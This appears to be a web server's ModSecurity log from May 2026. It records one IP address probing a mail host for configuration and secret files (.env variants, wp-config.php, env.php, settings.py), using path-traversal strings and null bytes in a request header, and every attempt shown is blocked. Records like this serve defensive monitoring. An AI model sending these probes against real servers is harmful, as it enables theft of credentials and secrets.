[Tue May 12 05:30:27.507542 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe081tk6y7yBJLpJo59QAAAIY"]
[Tue May 12 05:30:27.507805 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKe081tk6y7yBJLpJo59QAAAIY"]
[Tue May 12 05:30:27.630999 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe0tr1yOh9Tvizezif0wAAAEY"]
[Tue May 12 05:30:27.667276 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe09r1yOh9Tvizezif1gAAAEY"]
[Tue May 12 05:30:27.667320 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe09r1yOh9Tvizezif1gAAAEY"]
[Tue May 12 05:30:27.667347 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe09r1yOh9Tvizezif1gAAAEY"]
[Tue May 12 05:30:27.667566 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe09r1yOh9Tvizezif1gAAAEY"]
[Tue May 12 05:30:27.667598 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe09r1yOh9Tvizezif1gAAAEY"]
[Tue May 12 05:30:27.668039 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe09r1yOh9Tvizezif1gAAAEY"]
[Tue May 12 05:30:28.179690 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe0wgpmE1yW0glLdgueQAAAM4"]
[Tue May 12 05:30:28.223794 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe1AgpmE1yW0glLdgufgAAAM4"]
[Tue May 12 05:30:28.223875 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe1AgpmE1yW0glLdgufgAAAM4"]
[Tue May 12 05:30:28.224077 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKe1AgpmE1yW0glLdgufgAAAM4"]
[Tue May 12 05:30:28.302635 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe081tk6y7yBJLpJo59QAAAIY"]
[Tue May 12 05:30:28.343475 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe1M1tk6y7yBJLpJo5-gAAAIY"]
[Tue May 12 05:30:28.343732 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKe1M1tk6y7yBJLpJo5-gAAAIY"]
[Tue May 12 05:30:28.454315 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe09r1yOh9Tvizezif1gAAAEY"]
[Tue May 12 05:30:28.490953 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe1Nr1yOh9Tvizezif2QAAAEY"]
[Tue May 12 05:30:28.491005 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe1Nr1yOh9Tvizezif2QAAAEY"]
[Tue May 12 05:30:28.491033 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe1Nr1yOh9Tvizezif2QAAAEY"]
[Tue May 12 05:30:28.491624 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/health"] [unique_id "agKe1Nr1yOh9Tvizezif2QAAAEY"]
[Tue May 12 05:30:29.023037 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe1AgpmE1yW0glLdgufgAAAM4"]
[Tue May 12 05:30:29.067754 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKe1QgpmE1yW0glLdgugwAAAM4"]
[Tue May 12 05:30:29.068013 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKe1QgpmE1yW0glLdgugwAAAM4"]
[Tue May 12 05:30:29.131647 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe1M1tk6y7yBJLpJo5-gAAAIY"]
[Tue May 12 05:30:29.173079 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe1c1tk6y7yBJLpJo5_wAAAIY"]
[Tue May 12 05:30:29.173327 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.247:29824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKe1c1tk6y7yBJLpJo5_wAAAIY"]
[Tue May 12 05:30:29.299380 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe1Nr1yOh9Tvizezif2QAAAEY"]
[Tue May 12 05:30:29.335560 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe1dr1yOh9Tvizezif3AAAAEY"]
[Tue May 12 05:30:29.335605 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe1dr1yOh9Tvizezif3AAAAEY"]
[Tue May 12 05:30:29.335638 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe1dr1yOh9Tvizezif3AAAAEY"]
[Tue May 12 05:30:29.335840 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe1dr1yOh9Tvizezif3AAAAEY"]
[Tue May 12 05:30:29.335885 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe1dr1yOh9Tvizezif3AAAAEY"]
[Tue May 12 05:30:29.335941 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe1dr1yOh9Tvizezif3AAAAEY"]
[Tue May 12 05:30:29.336345 2026] [security2:error] [pid 1825179:tid 1825204] [client 45.148.10.247:29858] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/v1"] [unique_id "agKe1dr1yOh9Tvizezif3AAAAEY"]
[Tue May 12 05:30:29.885724 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKe1QgpmE1yW0glLdgugwAAAM4"]
[Tue May 12 05:30:29.930018 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKe1QgpmE1yW0glLdguiAAAAM4"]
